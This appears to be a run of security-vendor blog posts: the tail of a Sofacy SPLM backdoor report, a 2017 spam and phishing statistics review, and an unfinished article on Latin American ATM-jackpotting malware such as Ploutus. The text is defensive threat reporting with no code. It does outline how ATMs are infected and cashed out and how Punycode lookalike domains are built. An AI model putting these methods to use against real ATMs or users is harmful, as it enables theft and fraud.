The newer SPLM modules are deployed mostly to Central Asian based targets that may have a tie to NATO in some form. These targets include foreign affairs government organizations both localized and abroad, and defense organizations’ presence localized, located in Europe and also located in Afghanistan. One outlier SPLM target profile within our visibility includes an audit and consulting firm in Bosnia and Herzegovina.

Minor changes and updates to the code were released with these deployments, including a new mutex format and the exclusive use of encrypted HTTP communications over TLS. The compiled code itself already is altered per deployment in multiple subtle ways, in order to stymie identification and automated analysis and accommodate targeted environments. Strings (c2 domains and functionality, error messages, etc) are custom encrypted per deployment.

Targets: TR, KZ, BA, TM, AF, DE, LT, NL

SPLM/CHOPSTICK/XAgent Modularity and Infrastructure

This subset of SPLM/CHOPSTICK activity leads into several small surprises that take us into 2018, to be discussed in further detail at SAS 2018. The group demonstrates malleability and innovation in maintaining and producing familiar SPLM functionality, but the pragmatic and systematic approach towards producing undetected or difficult-to-detect malware continues. Changes in the second stage SPLM backdoor are refined, making the code reliably modular.

Infrastructure Notes

Sofacy set up and maintained multiple servers and c2 for varying durations, registering fairly recognizable domains with privacy services, registrars that accept bitcoin, fake phone numbers, phony individual names, and 1 to 1 email address to domain registration relationships. Some of this activity and patterns were publicly disclosed, so we expect to see more change in their process in 2018. Also, throughout the year and in previous years, researchers began to comment publicly on Sofacy’s fairly consistent infrastructure setup.

As always, attackers make mistakes and give away hints about what providers and registrars they prefer. It’s interesting to note that this version of SPLM implements communications that are fully encrypted over HTTPS. As an example, we might see extraneous data in their SSL/TLS certificates that give away information about their provider or resources. Leading up to summer 2017, infrastructure mostly was created with PDR and Internet Domain Service BS Corp, and their resellers. Hosting mostly was provided at Fast Serv Inc and resellers, in all likelihood related to bitcoin payment processing.

Accordingly, the server side certificates appear to be generated locally on VPS hosts that exclusively are paid for at providers with bitcoin merchant processing. One certificate was generated locally on what appeared to be a HP-UX box, and another was generated on “8569985.securefastserver[.]com” with an email address “root@8569985.securefastserver[.]com”, as seen here for their nethostnet[.]com domain. This certificate configuration is ignored by the malware.

In addition to other ip data, this data point suggested that Qhoster at https://www.qhoster[.]com was a VPS hosting reseller of choice at the time. It should be noted that the reseller accepted Alfa Click, PayPal, Payza, Neteller, Skrill, WebMoney, Perfect Money, Bitcoin, Litecoin, SolidTrust Pay, CashU, Ukash, OKPAY, EgoPay, paysafecard, Alipay, MG, Western Union, SOFORT Banking, QIWI, Bank transfer for payment.


Sofacy, one of the most active APT we monitor, continues to spearphish their way into targets, reportedly widely phishes for credentials, and infrequently participates in server side activity (including host compromise with BeEF deployment, for example). KSN visibility and detections suggests a shift from their early 2017 high volume NATO spearphish targeting towards the middle east and Central Asia, and finally moving their focus further east into late 2017. Their operational security is good. Their campaigns appear to have broken out into subsets of activity and malware involving GAMEFISH, Zebrocy, and SPLM, to name a few. Their evolving and modified SPLM/CHOPSTICK/XAgent code is a long-standing part of Sofacy activity, however much of it is changing. We’ll cover more recent 2018 change in their targeting and the malware itself at SAS 2018.

With a group like Sofacy, once their attention is detected on a network, it is important to review logins and unusual administrator access on systems, thoroughly scan and sandbox incoming attachments, and maintain two factor authentication for services like email and vpn access. In order to identify their presence, not only can you gain valuable insight into their targeting from intelligence reports and gain powerful means of detections with hunting tools like YARA, but out-of-band processing with a solution like KATA is important.

Technical Appendix Related md5


Related domains


Spam and phishing in 2017

Thu, 02/15/2018 - 05:00

Figures of the year
  • The share of spam in mail traffic came to 56.63%, down 1.68% against 2016.
  • The biggest source of spam remains the US (13.21%).
  • 40% of spam emails were less than 2 KB in size.
  • The most common malware family found in mail traffic was Trojan-Downloader.JS.Sload
  • The Anti-Phishing system was triggered 246,231,645 times.
  • 9% of unique users encountered phishing
Global events in spam

Spam emails that mention the hottest topics in the world news agenda are a permanent feature of junk traffic. This trend has been observed for several years and is unlikely to change any time soon. Natural disasters in 2017 (hurricanes Irma and Harvey, the earthquake in Mexico) were a gift to fraudsters. “Nigerian” scammers bombarded mailboxes with messages asking for assistance in obtaining the inheritance of deceased relatives and donations for disaster victims, etc. Natural disasters were also a common theme in advertising spam and emails offering jobs and loans.

In 2017 spammers made frequent mention of natural disasters

Sporting events are another favorite topic of spammers. The most popular — and most mentioned in fake giveaway messages — are major soccer competitions and the Olympics. Back in 2016 we picked up emails citing the FIFA 2018 World Cup, and the following year their number increased, with the format and content unchanged. Typically, such emails say that during such-and-such lottery, supposedly held by a well-known organization, the recipient was randomly selected among a million others as the winner of a huge cash prize. Besides money, scammers sometimes promise tickets to competitions. The details are usually outlined in file attachments using official competition and sponsor logos.

“Winning” the lottery can be timed to major sporting events

The “Nigerian” scammers often refer to famous figures. Presidents and other political VIPs are especially in demand. In 2017, one of the most popular figures for fraudsters was US President Donald Trump.

We predict that in 2018 scammers will continue to pay close attention to world events and famous figures so as not to let slip the chance to squeeze ever more money and personal info out of gullible victims.

Cryptocurrencies in spam

Throughout the year we wrote that cryptocurrencies had gained a foothold in advertising spam and fraudulent mailings: all the numerous “Earn from home” schemes, financial pyramids, fake lottery wins, and phishing scams, etc., seem to have been updated and given a cryptocurrency makeover. Let’s try to systematize the various types of cryptocurrency-related spam.


As major conferences and seminars are held on blockchain technology, spammers are making increasing use of this topic for their own purposes. The seminars advertised in their mailings don’t overload users with technical details, but promise to teach them how to extract eye-watering profits from cryptocurrencies. Such mailings are relatives of “traditional” spam on the topic “How to make a killing on the stock exchange.”

Example emails advertising “lucrative” seminars

Financial fraud

A specific type of cryptocurrency fraud relates to fake “cloud mining” services. Such services hire out the mining power of their own specialized data centers. Fake sites offer similar services, but on paying up, the user receives neither mining power nor their money back. The crypto version of the classic pyramid scam warrants a special mention: the user “receives” mining income until they enlist other victims (for which there is also a reward). But sooner or later the cash flow stops, and the original investment is not repaid.

Fake “cloud mining” services offer enticing rewards

Sites masquerading as cryptocurrency trading platforms operate in a similar manner. The crucial difference between them and real exchanges is that money can only be invested, not withdrawn. Revenue usually “grows” very quickly, stimulating the user to invest more funds.

On fake cryptocurrency exchanges, experience really isn’t necessary

More subtle are binary options brokers (and their fake counterparts). We covered them in a previous report.

Another type of cryptocurrency fraud is fake services offering to exchange one currency for another, or convert it into “real” money. Scammers lure victims with favorable exchange rates, and then make off with the cash.

The “currency exchange desk” simply pockets the money for itself

Spam is very often used for this kind of fraud because it gives what all scammers crave — anonymity.

Other types of fraud

More traditional types of fraud, such as fake lottery wins, started using bitcoin bait:


CryptoLocker, whose creators demanded payment in bitcoin, was found in spam far less often than in 2016. That said, we encountered various modifications of Locky, Cerber, Rack, and other ransomware. At the same time, new capabilities such as stealing passwords from cryptocurrency wallets and mining were added to spam-distributed malware.

What’s more, a host of malware was distributed in spam under the guise of bitcoin mining tools or trading instructions.

The attached document was detected as HEUR:Exploit.RTF.Generic

Address databases

Targeted address databases advertised through spam were updated with the email addresses of cryptocurrency users, putting the address owners at risk of a targeted attack (for example, phishing as mentioned above).

Like other hot global issues, cryptocurrency is set be a recurring theme in spam for a very long time to come. And given the juicy rewards on offer, 2018 can expect to see growth in both fraudulent and phishing “cryptocurrency” spam.

Spamming by ethnicity

As we all know, spam peddles everything from potency-enhancing drugs to fake goods by well-known brands — it’s an international phenomenon that knows no geographic boundaries. However, 2017 caught the eye for some more localized spam content.

China and manufacturing

Back in 2016, we wrote about the Chinese habit of using spam to market goods internationally. Nothing changed in 2017: More and more Chinese companies are offering their products in this way.

India and IT

Whereas the Chinese are keen to sell goods on the international market, spam from India is more likely to offer IT services: SEO, web design, mobile apps, and much more:

Russia and seminars

Russian spam is written in, yes, Russian — and is therefore aimed at the domestic market. It too advertises goods and services, but more striking is the range of seminars and training on offer:

America and targeted business spam

In the US, the law governing the distribution of advertising messages operates on the opt-out principle. Accordingly, users can be sent messages until they explicitly unsubscribe from the mailing list in question, for which a link must be provided. The CAN-SPAM Act stipulates many other legal requirements for mailings. The legislation demands that the message body match the subject in terms of topic, there be no automatic collection of addresses, the advertiser’s physical address appear in the text, and much more.

Using the opt-out principle, many small, and sometimes not-so-small, companies send out promotional materials to people who have not subscribed to them. A legal gray area arises from the fact that even if spam-mailing companies are physically located in the US, the emails are distributed worldwide, and most countries operate an opt-in policy, requiring the prior consent of recipients. In other words, some countries at the legislative level consider mailshots to be spam.

A trait of business spam is its very narrow targeting of companies operating in specific areas. Oftentimes, mailings are not directed to the company as a whole, but to people with certain job titles.

Malware and the corporate sector

The number of malicious spam messages in 2017 fell 1.6-fold against 2016. Kaspersky Lab clients registered a total of 145,820,119 triggers of Mail Anti-Virus throughout 2017.

Number of Mail Anti-Virus triggers among Kaspersky Lab clients in 2017

This drop is due to the unstable operation of the Necurs botnet: it mediated the spread of far fewer mailings, and in Q1 2017 was completely idle. Malicious mailshots sent via Necurs were short, not personalized. They were used to try to install cryptolockers from the Locky family on recipients’ computers.

In general, 2017 was marked by a large cluster of malicious, but well-crafted emails, containing fragments of business correspondence matching the company profile, plus the full details of the organizations in whose name they had been sent.

Emails containing malicious objects detected as

The messages were not mass-distributed, but most likely targeted. Based on the target domain names, it can be assumed that the attackers were primarily interested in the corporate sector, while the tactic of citing previous messages of the addressee suggests in some cases a Business Email Compromise-type attack.

An email containing a malicious object detected as Trojan-PSW.Win32.Fareit.dnak

Malware downloaded onto the victim computer most often had functions for collecting detailed information about the system and its settings (as well as passwords, keystrokes, etc.), and then transferring this data to a remote server. For information about potential targets and perpetrators of such attacks, see our article.

Phishing Phishing pages migrate to HTTPS

Sites have been moving to HTTPS in increasing numbers, and not just legitimate resources. If a year ago a top tip for users was “check that pages requesting personal data are secure,” today a certificate does not guarantee safety: anyone or anything could be behind it.

Where do scammers get certificates? For domains created specifically for fraudulent purposes, attackers most likely use free 90-day certificates from Let’s Encrypt and Comodo, two certificate authorities. Getting hold of one is simplicity itself.

A phishing site with a free 90-day certificate issued by Let’s Encrypt

What’s more, phishing pages are often located on hacked sites that already have the necessary certificates.

A phishing page located on a hacked site with HTTPS

Scammers also make use of free web hosting with an SSL certificate:

On the topic of free hosting sites, it should be noted that attackers often use services that do not closely monitor user-posted content. It is not uncommon for phishing content to be placed on free hosting sites of well-known companies: this reduces the risk of the page being blacklisted, since it is located on a reputable domain with a high-profile name and a good SSL certificate. And although such services are pro-active in the fight against illegitimate content, phishing pages on their domains are found fairly often.

A phishing page located on the Google Sites service redirecting users to a third-party resource where payment system data is requested

Phishing pages located on the Sites service

Punycode encoding

Another important rule is to always check the spelling of the domain name, a task made more difficult due to the active use by phishers of Punycode encoding, which helps mask phishing domain names under the domains of well-known brands. Web browsers use Punycode to display Unicode characters in the address bar, but if all the characters in the domain name belong to the character set for one language, the browser displays them not in Punycode format, but in the specified language. Scammers select characters similar or identical to ones in Latin script, and use them to create domain names that resemble those of well-known companies.

The technique is not new, but caused a real stir this year, especially after an article by Chinese researcher Xudong Zheng. As an example, he created a domain with a name that in the address bar was indistinguishable from Apple’s domain. Phishers aren’t always able to find identical symbols, but the results are still look pretty convincing.

Examples of domains displayed in Punycode in browser address bars

Besides the external similarity to the original domain, such domains are more difficult to detect by keywords.

Fake cryptocurrency wallets

Fraudsters are always up to speed on the latest trends, brands, and news hooks. The hype around cryptocurrencies in 2017 reached such a crescendo that even those far removed from the virtual world were snapping up bitcoin, whatever it was.

As a result, cryptocurrency wallets were a very attractive target for phishers. Proof of this is the large number of phishing pages spoofing cryptocurrency wallets. We encountered Coinbase, BitGo, and Xapo, to name just a few. One of the leaders by number of spoofs is

Examples of phishing pages mimicking user sign-in to popular cryptocurrency wallets

Scammers also spoof popular cryptocurrency services in an attempt to get users to hand over money under the guise of lucrative investments.

A page spoofing the popular Coinbase

Social media fraud

In Q2, social networks were hit by a wave of air ticket giveaways. Scammers set up websites under famous airline brands that were supposedly raffling off tickets. After completing a short survey, the user was redirected to a resource created by the attackers. This could be an infected site, a phishing page prompting to install malware under the guise of a browser update, or a page spreading malicious content, etc.

Examples of Facebook posts with links to various scamming domains

The scheme is not new, but the distribution mechanism in this case is innovative: in winning a “prize,” users themselves shared unsafe content in social media.

For some domains in the scheme, visitor activity statistics were available, according to which just one of the sites was visited by more than 2,500 users worldwide in the space of an hour:

In Q3, scammers shifted their attention to WhatsApp and extended their assortment of fake prizes.

Fake giveaways that began their odyssey in social media migrated to WhatsApp, and the range of prizes expanded

Fake viruses

Cybercriminals often don’t even bother to write malware, using instead fake virus notifications supposedly from common operating systems. Such messages often appear as pop-up ads or as the result of the user being passed through a redirect chain. This might happen after completing a survey, as in the scheme described above.

The scammers’ primary aim is to intimidate and coerce users into calling a “technical support” number where they are offered solutions to disinfect their computer — not free of charge, of course.

Examples of pages showing fake system infection messages

It’s not only Windows users in the firing line. Scammers are targeting Apple products, too.

Example of a page showing a fake system infection message

Under the same guise, cybercrooks also distribute insecure software.

Example of a page showing a fake system infection message and prompting to download a file

Tax refunds

Another eternal topic is tax returns and tax refunds. Public trust in government sites plays an important role in the success of phishing operations in this segment. Exploiting features of the taxation system in different countries, scammers carry out successful attacks in the US, France, Canada, Ireland, and elsewhere.

Examples of phishing pages using the names of tax authorities in different countries

The new iPhone

The release of the new version of the popular smartphone also attracted scammers, with attempts to redirect users to phishing pages mimicking Apple sites growing 1.5-fold in September, when the latest iteration of the flagship series went on sale.

Number of Anti-Phishing triggers on user computers caused by attempts to redirect to phishing sites using the Apple brand, 2017

The launch of Apple’s new smartphone inspired a host of fraudulent schemes, including fake giveaways, sales of counterfeit devices, and classic phishing scams mentioning the brand.

Fake Apple sign-in page

Statistics: spam Proportion of spam in email traffic

The share of spam in email traffic in 2017 fell by 1.68% to 56.63%.

Proportion of spam in global email traffic, 2017

The lowest share (52.67%) was recorded in December 2017. The highest (59.56%) belonged to September.

Sources of spam by country

In 2017, the US remained the biggest source of spam (13.21%). A 6.59% hike in spam distribution pushed China up to second place (11.25%). Vietnam took bronze (9.85%).

India slipped from third to fourth (7.02%), showing a 3.13% decline in its share of spam. Next came Germany (5.66%, +2.45%) and Russia (5.40%, +1.87%).

In the seventh place was Brazil (3.97%, -0.04%). And in ninth, France (3.71%, -0.32%). Italy rounds off the Top 10 with a score of 1.86%, up 0.62% against 2016.

Source of spam by country, 2017

Spam email size

In 2017, the share of very small emails (up to 2 KB) in spam again dropped sharply, averaging 43.40%, which is 18.76% less than in 2016. The proportion of emails ranging in size from 2 to 5 KB amounted to 5.08%, another significant change.

Spam emails by size, 2017

There was further growth in the share of emails between 5 and 10 KB (9.14%, +2.99%), 10 and 20 KB (16.26%, +1.79%), and 20 and 50 KB (21.23%, +11.15%). Overall, spam in 2017 did not buck the trend of fewer very small emails and rising numbers of average size emails (5-50 KB).

Malicious attachments in email Malware families

Top 10 malware families in 2017

In 2017, the most common malware family in email traffic was Trojan-Downloader.JS.Sload — a set of JS scripts that download and run other malicious programs on the victim computer, usually encryptors.

Runner-up was last year’s leader Trojan-Downloader.JS.Agent — the typical member of this malware family is an obfuscated JS that uses ADODB.Stream technology to download and run DLL, EXE, and PDF files.

Third place went to the Backdoor.Java.Qrat family — a cross-platform multi-functional backdoor written in Java and sold in the Darknet under the umbrella of Malware-as-a-Service (MaaS). It is generally distributed by email in the form of JAR attachments.

The Worm.Win32.WBVB family took fourth place. It includes executable files written in Visual Basic 6 (both in P-Code mode and Native mode) that are untrusted in KSN.

Trojan-PSW.Win32.Fareit completes the Top 5. This malware family is designed to steal data, such as the credentials of FTP clients installed on infected computers, cloud-storage credentials, browser cookies, and email passwords. Fareit Trojans send the information collected to the attackers’ server. Some members of the family can download and run other malware.

In sixth position was the Trojan-Downloader.MSWord.Agent family. This malware takes the form of a DOC file with an embedded macro written in Visual Basic for Applications (VBA) that runs when the document is opened. The macro downloads another malicious file from the attackers’ site and runs it on the user’s computer.

In seventh is Trojan.PDF.Badur, which poses as a PDF document containing a link to a potentially dangerous site.

Eighth place was occupied by the Trojan-Downloader.VBS.Agent family — a set of VBS scripts that use ADODB.Stream technology to download ZIP archives and run malware extracted from them.

Trojan.WinLNK.Agent found itself in ninth position. Members of this malware family have the extension .lnk and contain links for downloading malicious files or a path for running another malicious executable file.

One more family of Trojan loaders, Trojan.Win32.VBKrypt, props up the Top 10.

Countries targeted by malicious mailshots

In 2017, Germany (16.25%, +2.12%) held on to top spot. China (12.10%) climbed from third to second, adding 4.78% for the year. Russia (6.87%, +1.27%) rounds off the Top 3.

Countries targeted by malicious mailshots, 2017

Further down come Japan (5.32%, -2.27%), Britain (5.04%, -0.13%), Italy (4.89%, -0.55%), and Brazil (4.22%, -0.77%).

Eighth place is taken by Vietnam (2.71%, +0.81%). And ninth by France (2.42%, -1.15%). The Top 10 is rounded off by the UAE (2.34%, +0.82%).

Statistics: phishing

In 2017, the Anti-Phishing system was triggered 246,231,645 times on computers of Kaspersky Lab users as a result of phishing redirection attempts. That is 91,273,748 more than in 2016. In all, 15.9% of our users were targeted by phishers.

Organizations under attack

The rating of organizations targeted by phishing attacks is based on the triggering of the heuristic component in the Anti-Phishing system on user computers. This component detects all instances when the user tries to follow a link in an email or on the Internet to a phishing page in the event that such links have yet to be added to Kaspersky Lab’s databases.

Organizations under attack by category

The lion’s share of heuristic component triggers in 2017 went to pages that mentioned banking organizations (27%, +1.24%). Second place in the rating is the Payment systems category (15.87%, +4.32%), followed by Online stores (10.95%, +0.78%).

Distribution of organizations subject to phishing attacks by category, 2017.

See our financial report (link) for more details about phishing in the financial sector.

Top 3 organizations under attack from phishers

As before, the trend in mass phishing is still to use the most popular brands. By doing so, scammers significantly increase the likelihood of a successful attack. The Top 3 is made of organizations whose names were most often used by phishers (according to the heuristic statistics for triggers on user computers):

Facebook 7.97% Microsoft Corporation 5.57% PayPal 4.50% The geography of attacks Countries by percentage of attacked users

As in the previous year, Brazil had the highest percentage of attacked unique users out of the total number of users in the country, seeing its score increase by 1.41% to 29.02%.

Percentage of users on whose computers the Anti-Phishing system was triggered out of all Kaspersky Lab users in the country, 2017

Top 10 countries by percentage of attacked users

Brazil 29.02% Australia 22.51% China 19.23% Qatar 18.45% Bolivia 18.38% Albania 17.95% New Zealand 17.85% Portugal 16.76% Angola 16.45% Russia 16.43%

Top 10 countries by percentage of attacked users

The number of attacked users also increased in Australia — by 2.43% to 22.5%. Next come China (19.23%), where the share of attacked users fell by 3.61%, and Qatar (14.45%).


The number of malicious spam messages in 2017 fell 1.6-fold against 2016. This drop is due to the unstable operation of the Necurs botnet, which mediated the spread of far fewer mailings.

In 2018, spammers and phishers will continue to closely monitor world events and famous figures so as not to miss any opportunity to extract money and personal info from their unsuspecting targets. We can expect mailings to refer to the Winter Olympic Games, the FIFA World Cup, the presidential elections in Russia, and other events. What’s more, the first few months of the year are likely to experience a wave of phishing pages and mailshots exploiting the topic of tax refunds, since in many countries April is tax payment month. The theme of cryptocurrency will be popping up in spam for a very long time to come. And given the juicy rewards on offer, 2018 can expect to see growth in both fraudulent and phishing “cryptocurrency” spam.

The number of phishing sites using SSL certificates will surely continue to grow. As will the use of different domain name obfuscation methods.

Bingo, Amigo! Jackpotting: ATM malware from Latin America to the World

Wed, 02/14/2018 - 05:00


Of all the forms of attack against financial institutions around the world, the one that brings traditional crime and cybercrime together the most is the malicious ecosystem that exists around ATM malware. Criminals from different backgrounds work together with a single goal in mind: jackpotting. If there is one region in the world where these attacks have achieved highly professional levels it’s Latin America.

From “Ploutus”, “Greendispenser”, “Prilex”, traditional criminals and Latin American cybercriminals have been working closely and effectively to steal large sums of money directly from ATMs with quite an elevated rate of success. In order to do it, they have developed a number of tools and techniques that are unique to this region, eventually importing malware from Eastern European cybercriminals and then improving the code to create their own domestic solutions, which they later deploy on a larger scale.

The combination of factors such as the use of obsolete and unsupported operating systems and the availability of easy to use development platforms have allowed the creation of malicious code with technologies such as the .NET framework, without the need for too high technical skills.

We are facing a rising wave of threats against ATMs that have been technically and operationally improved, becoming an immense challenge for financial institutions and security professionals alike. Currently, the attacks on such devices have already generated considerable losses for financial institutions, begging the question: What and when will the next big hit be? “Motivation” is the key word. Why focus on stealing information to monetize it later when it is easier to steal funds directly from the bank?

In this article, we will show an overview on operational details about how these regional attacks against financial institutions have created a unique situation in Latin America. We’ll also highlight how banks and security companies are falling victims to them and how attacks are spreading in the region, aiming to surpass jackpot attacks coming from mariachis and chupacabras.

Dynamite, fake fronts, ATM (in)security

The easiest way to steal money from an ATM machine used to be to blow it up. Most Latin American cybercriminals used to do it on a regular basis. In fact, this type of attack still happens in several parts of the region. Security cameras, CCTV and any other physical security measures proved ineffective in deterring this rudimentary yet extremely effective attack. In many cases, the explosive devices used by the thieves caused damage, not only to the ATMs, but also to bank branches, public squares and the shopping malls in which they were located. A small number of incidents have even caused damage to buildings close to banks.

Explosive attacks on ATMs are a rising problem in Europe as well. In a report covering the first six months of 2016, EAST (European Association for Secure Transactions) reported a total of 492 explosive attacks in Europe; a rise of 80 percent compared to the same period in 2015. Such attacks do not just present a financial risk due to stolen cash, but are also the cause of significant collateral damage to equipment and buildings. Of most concern is the fact that lives can also be placed in danger, particularly by the use of solid explosives.

Actually, it is effortless to find videos on YouTube showing the explosions of ATM machines, mainly in Brazil.

Old school way of robbing an ATM: blowing it up. Some examples here and here.

In an attempt to stop these attacks, Brazilian banks have adopted ink cartridges to stain the bills when the ATM is blown up. Criminals responded quickly, finding a way to remove the ink from the bills using a special solvent. It’s the eternal cat-and-mouse (or should we say a mouse and cat) game among fraudsters and financial institutions.

Another bold maneuver used commonly by criminals in Latin America is to cover the front of an ATM with a whole fake piece that looks like the original. Such an approach seems to surprise visitors when traveling to our region. This technique was presented to the media by Brian Krebs as the “biggest skimmer of all“. Actually, criminals are able to install it without any complications in a day light in supermarkets and other retail businesses (see video).

ATM fake fascia: what you see is not what you get.

For criminals, it’s not difficult to build a fake replica of an ATM machine, especially since they can buy the parts needed on the black-market and even on-line stores easily. Here’s an example of an ATM keyboard sold at a regional on-line store (the Latin American eBay). This device helps cybercriminals build whatever they want. Sometimes, criminals find and recruit insiders right from the ATM industry.

You can build your own fake home assemblied ATM, buying it in pieces…

Another worldwide problem affecting ATMs in Latin America is the reliance on obsolete software with several unpatched vulnerabilities, that’s installed and in-use every day in production environments. Most ATMs are still running on Windows XP or Windows 2000, systems that have already reached their end-of-life, and Microsoft has officially ceased to support for them. In addition to the obsolete software, one may frequently find ATMs with completely exposed cables and network devices that are easy to access and manipulate. Such situations are due to insufficient physical security policies, opening a variety of possibilities to the region’s criminals.

Cables and routers exposed in ATMs running Windows XP: a gold mine for scammers.

However, such attacks represent a risk for those criminal daredevils as they can be recorded by surveillance cameras while trying to tamper with the machines, inserting a dynamite stick, or installing a fake ATM cover right in front of big brother’s eyes. As banks have enhanced the physical security of ATMs, it is no longer so profitable for criminals to rely on the physical assaults of these, thus giving way to the gradual rise of ATM malware in the region.

The process of stealing money from ATMs using malware typically consists of four stages:

  • The attacker gains local/remote access to the machine.
  • Malicious code is installed in the ATM system.
  • In some cases, to complete the infection process, a reboot of the ATM is needed. Sometimes cybercriminals use umbrella or blackbox schemes to reboot and for their operations support.
  • The final stage (and the ultimate goal of the entire process) is withdrawing the money – jackpotting!

Getting access to the inside of an ATM is not a particularly difficult task. The process of infecting is also fairly clear – arbitrary code can be executed on an obsolete (or insufficiently secured) system. There seems to be no problem with withdrawing money either – the malware interface is usually opened by using a specific key combination on the PIN pad or by inserting a “special card”. Sometimes all that is needed is a remote command sent from an already compromised machine in the bank’s network, leaving the “mule” ready for the final step of the game and cashing out without raising any eyebrows.

From Eastern Europe to Latin America

A report from the European ATM Security Team (EAST), shows that global ATM fraud losses increased 18 percent to €156 million (US $177.5 million) in the first half of 2015, compared to the same period in 2014. EAST attributes much of that increase to an 18 percent rise in global card-skimming losses, which includes €131 million (U.S. $149 million) of that total. Unfortunately, it seems there are no official statistics of such attacks and loses in Latin America. ATEFI (the Latin American Association of Service, Operators and Electronic Funds Transfer) does not publish public reports on such attacks.

There is a strong “B2B” cooperation between Eastern European and Latin American cybercriminals. On December 7, 2015, a 26 years old Romanian citizen was arrested in Morelia, Mexico, as he was suspected to be involved in the credit card cloning business. He was caught with $180,000.00 mxn in cash (around $ 9,700.00 USD) after someone from the community reported his suspicious behavior. He had a criminal record in Romania for being a part of an illegal organization connected to counterfeiting and using stolen credit cards. At the beginning of 2017, 31 people were arrested in a coordinated police operation and were charged with belonging to a gang dedicated to the credit card cloning business, among them a Cuban citizen, an Ecuadorian citizen, nine Venezuelans, three Romanians, two Bulgarians and 15 Mexicans. This served as further evidence that carders from Europe and Latin America are connected and occasionally work together.

Backdoor.Win32.Skimer was the first malicious program infecting ATM machines that came up back in 2008. Once the ATM was infected using a special access card, criminals were able to perform a number of illegal operations: withdrawing cash from the ATM, or obtaining data from cards used in the ATM. The coder behind it clearly new how ATM hardware and software work. Our analysis of this Trojan concluded that it was designed to target ATM machines in Russia and Ukraine. It works with US dollar, Russian ruble, and Ukrainian hryvnia transactions. More recently, in 2014, we published a detailed post about Tyupkin, an ATM malware found active on more than 50 ATMs in financial institutions in Eastern Europe. We have enough evidence that Latin American cybercriminals are cooperating with the Eastern European gangs involved with ZeuS, SpyEye and other banking Trojans created in that part of the world. This collaboration directly results in the code quality and sophistication of local Latin American malware. Regional cyber criminals also lease the infrastructure of their Eastern European counterparts. The same applies for ATM malware, which is evolving together with other Latin American malware families.

It’s also common to find Latin American criminals on Russian underground forums looking for samples, buying new crimeware packages and exchanging data about ATM/PoS malware, or negotiating and offering their “professional” services. Since most of them are not proficient in Russian, their writing often includes misspelled Russian words as they rely on automated translation services. Sometimes, they just write in Spanish, so Eastern European cybercriminals have to use automated translation. In any case, despite the language barrier, they negotiate use the acquired knowledge to boost the spread of their malware operations in Latin America.

Latin American criminals in the Russian underground: looking for ATM software

We believe that the first contacts between both cybercriminal worlds happened back in 2008 or even a little earlier. This is only the tip of the iceberg, as this kind of exchange tends to increase over the years as crime develops and looks for new techniques to attack businesses and end users in general.

Mexico: Ploutus – “god of wealth”

According to Greek mythology, Ploutus represented abundance and wealth; a divine child capable of dispensing his gifts without prejudice. However, in the real world, the economic impact of this rampant malware has been estimated at $ 1,200.000.000 MXN ($ 64,864,864.00 USD), considering that only in Mexico, approximately 73,258 ATMs have been found to be compromised.

The first variant of Ploutus became public in October 24, 2013, uploaded to VirusTotal by someone in Mexico, with the filename ‘ploutus.exe’. At that time, the sample had a low detection rate and some AV companies detected it as a Backdoor.Ploutus – Symantec or Trojan-Banker.MSIL.Atmer – Kaspersky.

During 2014 and 2015, a nation state level investigation in relation to ATM robberies using malware resulted in an increased number of uncovered incidents all over Mexico. In August 2013, investigators finally busted a operation connected to about 450 ATMs from 4 major Mexican banks.

Compromised machines were mostly located in places lacking or with very limited physical surveillance. Malware was deployed either via the CD-ROM drive (in the first versions) or a USB port in latter versions. These attacks caught the attention of the banks’ security departments in an odd manner. The armored transportation company began to receive a rare number of phone calls and alerts in respect to unusually high amounts of money being withdrawn from ATMs. The machines were reporting low cash flow levels just hours after being filled by the company in charge of this service.

The second attack was perpetrated during the Mexican Black Friday, locally known as “El Buen Fin”. During these dates, ATMs are stocked with more money in order to fulfill customer demand (approximately 20% more funds than usual are added). Lastly, the third attack was carried out during Valentine’s Day, which is celebrated on February 14th in Mexico. Dates in which ATMs are heavily used and have more funds than usual certainly attracted the attention of this group, which seemed to plan its attacks in advance while hiding in plain sight.

Ploutus developers are not trying to hide the origins of their code.

To install this malware, physical access to the ATM is needed. Usually, this is achieved via USB or CD drive, facilitating directly from the infected ATM machine and not merely cloning credit or debit cards. So, the damage is for financial Institutions and not their customers, at least not directly.

Strings in Spanish language display the goal of Ploutus

In this case, the business model is to sell licenses which are valid only for a day, allowing the “customer” (cybercriminal) to withdraw money from any number of machines during that particular day. It may take between two and half to three hours to empty the cash dispensing cassettes of an ATM.

According to a private investigation, a default arrangement for cybercriminals gangs is an average of 3 individuals per cell, with up to 300 people involved in the campaigns. Each group is responsible for compromising a chosen ATM with malware, obtaining an ID that is used afterwards to request an activation code via SMS, allowing full access to all of the ATM’s services.

Graphical user interface of an early version of Ploutus; shown when the correct activation sequence matches.

So far, we have seen four different versions or generations of the Ploutus malware family, the last one, which pertains to 2017, includes bug fixes and code improvements. For the first versions found in-the-wild there was no way of “calling home” or reporting the activities done on the ATM back to a C2 server. However, there is a SMS module used to obtain a unique identifier for the machine that allows the activation of the malicious code remotely. Once activated, money mules (operators standing at the ATM) can start withdrawing money until the licensed time expires. The procedure is as follows:

  1. Compromise the ATM, via physical access through the CD-ROM drive or USB ports of the machine.
  2. The install malware will run in the system as a regular Microsoft Windows service.
  3. Acquire an ATM ID used for the identification and activation of the machine.
  4. Some versions send a SMS to activate the “customer” (infected ATM), while others require physical access and connecting a keyboard in order to interact with the malware.
  5. Cash out while the malware is active for 24 hours.

The newest version, found in-the-wild later in 2017, granted criminals full remote administration of infected ATMs and the capability to run diagnostic tools along with other crafted commands. In that latest version we found that cybercriminals switched from a physical keyboard to access ATMs to WiFi access with a special modified TeamViewer Remote management tool module. This made it possible to conduct malicious operations more scalable and less risky for the cybercriminals.

Kaspersky Lab detects the samples described above as Backdoor.MSIL.Ploutus, Trojan-Spy.Win32.Plotus and HEUR:Trojan.Win32.Generic

Colombia: corruption, insiders and legit software

In October 2014, 14 ATMs were compromised in different cities of Colombia. The economic impact was around $ 1,024.00 million (Colombian Pesos) without any trackable transaction. Later, an employee at one of the banks was arrested as he was suspected of installing the malware remotely in all of the ATMs using his personal security code and passwords, just one day before resigning his job.

